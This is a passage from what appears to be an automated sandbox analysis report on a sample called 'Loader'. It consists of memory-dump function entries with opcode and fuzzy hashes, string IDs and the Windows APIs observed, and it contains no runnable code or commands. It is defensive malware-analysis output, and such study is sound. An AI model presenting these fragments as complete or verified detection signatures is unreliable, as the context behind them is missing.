                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                • String ID:
                                                                                                                • API String ID: 254469556-0
                                                                                                                • Opcode ID: c9e219896418913f1c6436ec006c521fcbf7f52045f68ee682412900a6ae19dd
                                                                                                                • Instruction ID: 8a73a1ef376d030a2178dddb642ca8749a23eadf193294cf21278936531b1939
                                                                                                                • Opcode Fuzzy Hash: c9e219896418913f1c6436ec006c521fcbf7f52045f68ee682412900a6ae19dd
                                                                                                                • Instruction Fuzzy Hash: 4131D775D05219DBDB21DFA4D989BCDBBF8AF08300F1041EAE40CAB250EB719B859F45
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00CC96B0,00CE6C8C), ref: 00CC96B8
                                                                                                                • UnhandledExceptionFilter.KERNEL32(00CC96B0,?,00CC96B0,00CE6C8C), ref: 00CC96C1
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00CC96B0,00CE6C8C), ref: 00CC96CC
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00CC96B0,00CE6C8C), ref: 00CC96D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3231755760-0
                                                                                                                • Opcode ID: 9724667a8b1ebd4b36daae28e541807cae41d33aba8b1eef62f58cdc03255e92
                                                                                                                • Instruction ID: 210dc43554427c696cddb980a2614deb62bf2fe2e5041468c74bdb4ff40bfbc8
                                                                                                                • Opcode Fuzzy Hash: 9724667a8b1ebd4b36daae28e541807cae41d33aba8b1eef62f58cdc03255e92
                                                                                                                • Instruction Fuzzy Hash: F5D01232001288ABDB802BE0EC8CB8D3FA8FB08392F044400F70A8A062CB3544008B66
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 004285EC
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 00428677
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                • String ID: h
                                                                                                                • API String ID: 237503144-2439710439
                                                                                                                • Opcode ID: 917631255cea874d52ee2451cd31ec8c6a983d8220657606dbb23d5300a23d1a
                                                                                                                • Instruction ID: 6da96b05192abfa36c2a8587af07314eead40ac1a1aac6b03a878773a9e830e3
                                                                                                                • Opcode Fuzzy Hash: 917631255cea874d52ee2451cd31ec8c6a983d8220657606dbb23d5300a23d1a
                                                                                                                • Instruction Fuzzy Hash: E0B152B4608350DFE3109F25E84072FBBE5FB8A304F45896DF5C897291DB79890ACB4A
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 00428240
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                • String ID: yFP$pv
                                                                                                                • API String ID: 237503144-1043563703
                                                                                                                • Opcode ID: f10766b3e79ff34c811775228f90b1f749822b533f99bee141e4a8521bc8357b
                                                                                                                • Instruction ID: 026c7c20c7aa87b3c201e73a36abf931272afcd6fe876e8aa0be72b8c63f741b
                                                                                                                • Opcode Fuzzy Hash: f10766b3e79ff34c811775228f90b1f749822b533f99bee141e4a8521bc8357b
                                                                                                                • Instruction Fuzzy Hash: 1561AEB2E042298FDB24CF68DC917DEB7B1FB45304F1081A9D459EB381DB749A868F91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: :)(8$KJIH$T)(8$uxB
                                                                                                                • API String ID: 0-1987596445
                                                                                                                • Opcode ID: 3345145acc49b9c3dbac7cb31740d04c8c160c59f9f4c2bc1283cb842ee06d6c
                                                                                                                • Instruction ID: ccc3da5218a74a692c786e2037a5d08811c05f9e94c8575ce9ebbbf82118eadb
                                                                                                                • Opcode Fuzzy Hash: 3345145acc49b9c3dbac7cb31740d04c8c160c59f9f4c2bc1283cb842ee06d6c
                                                                                                                • Instruction Fuzzy Hash: 1F8134B5E00329CFDB108FA8DC817AAB7B1FF4A314F154169E985AB351E7396C11CB88
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ;:98$BSA$D]+\
                                                                                                                • API String ID: 0-196827673
                                                                                                                • Opcode ID: c7982d4f4271d16111dd4f2137e28447e8435baee3f58ac8e6d71932b6150687
                                                                                                                • Instruction ID: 28ac4e1643055a154b02c81a005dabff3eadb9e6cd05567daceab985af77b9f4
                                                                                                                • Opcode Fuzzy Hash: c7982d4f4271d16111dd4f2137e28447e8435baee3f58ac8e6d71932b6150687
                                                                                                                • Instruction Fuzzy Hash: D6123678608300DFEB049F24E842BAFB7E1EBCA314F15593DF581972A2D7359C458B8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .>$RC
                                                                                                                • API String ID: 0-739570707
                                                                                                                • Opcode ID: 88843e9d9ca97e761628b6e7b81a6613e55d2fef027e54e64495080aa6d0c652
                                                                                                                • Instruction ID: 3b0b953b2d33e2e96e4eab31f83276a2f906f400271f46ba91b71cc12d4bd901
                                                                                                                • Opcode Fuzzy Hash: 88843e9d9ca97e761628b6e7b81a6613e55d2fef027e54e64495080aa6d0c652
                                                                                                                • Instruction Fuzzy Hash: CE22033AA08261CFD704CF68E89066BB7E2FBCE311F0A89BDD98987355D6349C41DB45
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004280E7
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?,7D3C441D), ref: 004281D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                • String ID:
                                                                                                                • API String ID: 237503144-0
                                                                                                                • Opcode ID: 1a636787e15b6dfbffc777b98caeaa58adb1bad3d2e6ff711b04f599927b9df5
                                                                                                                • Instruction ID: 140769ea01505089deb0bb54f1d738c6ab876715078b8d5b7427788b4e0e7cb1
                                                                                                                • Opcode Fuzzy Hash: 1a636787e15b6dfbffc777b98caeaa58adb1bad3d2e6ff711b04f599927b9df5
                                                                                                                • Instruction Fuzzy Hash: AA419C749102689FEF10CFA8A895BDEBFB5FB42304F61422DE915BB282D7305806CB95
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .>$RC
                                                                                                                • API String ID: 0-739570707
                                                                                                                • Opcode ID: 8dac014fd9d88024ae43f355d033b8fd659b9da0999b59c2f11948acf9a83e36
                                                                                                                • Instruction ID: a9902c64a6cfc45d1455ef59315f04145ba005826457c5f7f8924b4738a1d797
                                                                                                                • Opcode Fuzzy Hash: 8dac014fd9d88024ae43f355d033b8fd659b9da0999b59c2f11948acf9a83e36
                                                                                                                • Instruction Fuzzy Hash: 0F12003A608261CFD704CF69E89062BB7E2EBCE311F0A89BDD58887352D634DC45DB45
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: KJIH$KJIH
                                                                                                                • API String ID: 2994545307-1827572986
                                                                                                                • Opcode ID: 5901b9c9801437ca6da1e1bc95f8392794ef0c03be606285b9c1f4b32955998d
                                                                                                                • Instruction ID: 3fd2a51386bd38244c82c33b2d410de7c36aa468ed45cb75ba0ce9b550d5e39c
                                                                                                                • Opcode Fuzzy Hash: 5901b9c9801437ca6da1e1bc95f8392794ef0c03be606285b9c1f4b32955998d
                                                                                                                • Instruction Fuzzy Hash: 8E9113B8A09314DFD304DF24E89166B77A1FBDA305F96483DE48287252D7389906CB5F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RC
                                                                                                                • API String ID: 0-2052145962
                                                                                                                • Opcode ID: eaa9e5013958e1e58c4ef7d442ec53acd66b901e1c21d984c1301b7d455dd4a6
                                                                                                                • Instruction ID: 188d59449aa71c54b0dd6d55903c93429df92ca099489ec84c81c7faccd89538
                                                                                                                • Opcode Fuzzy Hash: eaa9e5013958e1e58c4ef7d442ec53acd66b901e1c21d984c1301b7d455dd4a6
                                                                                                                • Instruction Fuzzy Hash: F6F1F23A608261CFD704CF29D89066BB7E2EBCE315F0A89BDD88987352D634DC45DB84
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RC
                                                                                                                • API String ID: 0-2052145962
                                                                                                                • Opcode ID: be9982a96f6003c29145d46537963d060124fa44baad1eaeff07975e1c03206d
                                                                                                                • Instruction ID: 24a6c064fd117c3e02e04e430fcfa4dad7956b8eb8a585ad1a92957b63ef26be
                                                                                                                • Opcode Fuzzy Hash: be9982a96f6003c29145d46537963d060124fa44baad1eaeff07975e1c03206d
                                                                                                                • Instruction Fuzzy Hash: 12E1E236608261CFD708CF29D89166BB7E2EBCE301F0A89BDD88987356D634DC45DB85
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RC
                                                                                                                • API String ID: 0-2052145962
                                                                                                                • Opcode ID: b6a75dfe833e2229e65178c9ca1fb15727d8664f0b5e76c402b8a1fe40f341b1
                                                                                                                • Instruction ID: ab2a1d9537d956290d8e2ae9b2c7fc899c7dd772ecb5a654228f72f34c74fc1d
                                                                                                                • Opcode Fuzzy Hash: b6a75dfe833e2229e65178c9ca1fb15727d8664f0b5e76c402b8a1fe40f341b1
                                                                                                                • Instruction Fuzzy Hash: 26D104356082618FD708CF29D89166BBBE2EBCE300F0A89BDD8C987352D635DC45CB85
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "
                                                                                                                • API String ID: 0-123907689
                                                                                                                • Opcode ID: f50701cb7387290be5b77d209286991e0be769b517a411cc81d387e172c523ad
                                                                                                                • Instruction ID: 0eaeaa1ef173875a006067207e7b5c011d7810b1169704ed49223c6ff45e0f17
                                                                                                                • Opcode Fuzzy Hash: f50701cb7387290be5b77d209286991e0be769b517a411cc81d387e172c523ad
                                                                                                                • Instruction Fuzzy Hash: BDD146B2B083219FD714DE24E85176BB7D5AF84314F48892FE89987381E738EC45C78A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: KJIH
                                                                                                                • API String ID: 0-1239430616
                                                                                                                • Opcode ID: 171359fecd5211568442c695c83101434cb5e552b331806795a594ed28362a9b
                                                                                                                • Instruction ID: 0314d729e1bd4c8a4f402b591968989632aed2d55f3d507ba63187338832275f
                                                                                                                • Opcode Fuzzy Hash: 171359fecd5211568442c695c83101434cb5e552b331806795a594ed28362a9b
                                                                                                                • Instruction Fuzzy Hash: 0C8122B8A09304DFE304DF24EC8162B77A1FBDA304F56483EE48197261D7389816CB5B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "
                                                                                                                • API String ID: 0-123907689
                                                                                                                • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                • Instruction ID: 740f0eab0e3446e46d754a29a0c893ff3538b6eed32640b7ed83bb07cb142a0e
                                                                                                                • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                • Instruction Fuzzy Hash: 25711532B083255BD714CE29E48031FBBE2ABC5710FA9852FE4949B391D739EC45D78A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: de25b8306d0966e9a7cb574966eb00218c7bc550a7dae95f40679f6c08373d4c
                                                                                                                • Instruction ID: c01d0ac4c5e1d30fdbb4685948f685f70b8d59acb6522e17a761f546efcd269d
                                                                                                                • Opcode Fuzzy Hash: de25b8306d0966e9a7cb574966eb00218c7bc550a7dae95f40679f6c08373d4c
                                                                                                                • Instruction Fuzzy Hash: 38416676E053009BD7188F14CC02B2BB7E2FFD8314F09992DE5895B3A0E7759808C78A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RC
                                                                                                                • API String ID: 0-2052145962
                                                                                                                • Opcode ID: c7922054ee7a4c4f3529f22edb1d008cab52ee608b0a4ac1419adc4944d70704
                                                                                                                • Instruction ID: dc912fae45d474757f51ad8b4dc45c00f2730fde0556c5e3657e1f5aa16ecb4d
                                                                                                                • Opcode Fuzzy Hash: c7922054ee7a4c4f3529f22edb1d008cab52ee608b0a4ac1419adc4944d70704
                                                                                                                • Instruction Fuzzy Hash: 2D51243910D2A1DBC7048F25E8A0667BBE3AB8B705F4DC5FDC4C847396E6358815DB54
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: KJIH
                                                                                                                • API String ID: 0-1239430616
                                                                                                                • Opcode ID: bb652a2b732e93a9a2e60da3115c40c45187687863db7593936ec55d89b7611d
                                                                                                                • Instruction ID: 82c0f1ec7d6a73cf931a5d30ce39ba8c57cc9c24421601cf5fddb82c06c88540
                                                                                                                • Opcode Fuzzy Hash: bb652a2b732e93a9a2e60da3115c40c45187687863db7593936ec55d89b7611d
                                                                                                                • Instruction Fuzzy Hash: 1A217C74B073208BD3188B54E98153F7393BFDA718FA6462FD58227746C6286C02879E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: ;:98
                                                                                                                • API String ID: 2994545307-152368606
                                                                                                                • Opcode ID: dab9f2827aba08b165c7aac0e486990032caa56db21b6122b5188f9f5ad13fb1
                                                                                                                • Instruction ID: 85e6f7f2ad5f6ed6be70f96b5fb30400411e09ba8578afe73efd15eb801782cb
                                                                                                                • Opcode Fuzzy Hash: dab9f2827aba08b165c7aac0e486990032caa56db21b6122b5188f9f5ad13fb1
                                                                                                                • Instruction Fuzzy Hash: 82112579E453428BE328DB54D851BBBB3A3E7C6300F49C43DD485E3285DB389C069749
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: eb93d84dcfc19be5caa5e094c4005043853c56ff4e222b72d0d4c462703aa76a
                                                                                                                • Instruction ID: a1299e9bb5d21da042c7c98357e958a0d15b1e79b33078520b9fadae00b39269
                                                                                                                • Opcode Fuzzy Hash: eb93d84dcfc19be5caa5e094c4005043853c56ff4e222b72d0d4c462703aa76a
                                                                                                                • Instruction Fuzzy Hash: 1522A032A0C7118BD725DE18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4cbb3835a17f4906e733f8d8a601b35127e782b0f4d8a2526924d9d09b22cbec
                                                                                                                • Instruction ID: ce0549cd3e898189bc2f519ef3ffc9b5f1a0a0932b43f7bde13a8c16fd854004
                                                                                                                • Opcode Fuzzy Hash: 4cbb3835a17f4906e733f8d8a601b35127e782b0f4d8a2526924d9d09b22cbec
                                                                                                                • Instruction Fuzzy Hash: 37D1E43F629212CBC7189F38D86116EB3E2FF8A795F0A857DD481572A0EB3988508755
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 29e30762cd198d07baf172038ea6e678641816a83bca1c3dbf879ffd016bfde3
                                                                                                                • Instruction ID: 9e4d4f321f2ab9fee31fadf70e7d3c99dcaffe26a7035ebad20387f70980d1ea
                                                                                                                • Opcode Fuzzy Hash: 29e30762cd198d07baf172038ea6e678641816a83bca1c3dbf879ffd016bfde3
                                                                                                                • Instruction Fuzzy Hash: E9F1CD356087418FD724CF29C88062BFBE6EFD9300F08882EE5D597391E639E945CB96
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d8faad6a29270cdedf86b6e9b69f39c533fc13f9793eded9b955dd3c87ef0b42
                                                                                                                • Instruction ID: adc0e7a3bb8e1d948c8060b51b56e6b90c9ecb5cc601dfc554054ddd671d30dc
                                                                                                                • Opcode Fuzzy Hash: d8faad6a29270cdedf86b6e9b69f39c533fc13f9793eded9b955dd3c87ef0b42
                                                                                                                • Instruction Fuzzy Hash: D1516822754B418BC7298E75D9D0277BFE3AFA3304B5CDAADC0D247786C678A40A8B54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e84d0e4399bea411451f2211db7bad7f4c3a4ba9edb2c31e77a4adb7008287d
                                                                                                                • Instruction ID: 7ab2f63fb84900acdd1656d73215f2142beefe0aa729eb43cc87bb6b1277d5f5
                                                                                                                • Opcode Fuzzy Hash: 4e84d0e4399bea411451f2211db7bad7f4c3a4ba9edb2c31e77a4adb7008287d
                                                                                                                • Instruction Fuzzy Hash: C4513431210B818BD729CF36C8903F7BBD29F92210F0C886EC4D797392D63CA84A8725
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fab6b139baaac9e4e5d8178fd3fa3324eed87b8efa9120a8cc97db6c44517ebf
                                                                                                                • Instruction ID: 1a1032abd0865255696ec9c6f60ab36adff7f027e707a3b562032f5702beb69f
                                                                                                                • Opcode Fuzzy Hash: fab6b139baaac9e4e5d8178fd3fa3324eed87b8efa9120a8cc97db6c44517ebf
                                                                                                                • Instruction Fuzzy Hash: 3E512435214B408BD729CF31C4507B3BBE2AF92310F48886EC8D797756DB38A446C725
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08d0444338c68c94f28b2acb6eb60e962d4fc9d78141168b8e62b7e7dd2dd943
                                                                                                                • Instruction ID: c6a06d5f47a09792a17c42cfadbf8418dcd07b9b28c5b5067b6b291b7be5bac0
                                                                                                                • Opcode Fuzzy Hash: 08d0444338c68c94f28b2acb6eb60e962d4fc9d78141168b8e62b7e7dd2dd943
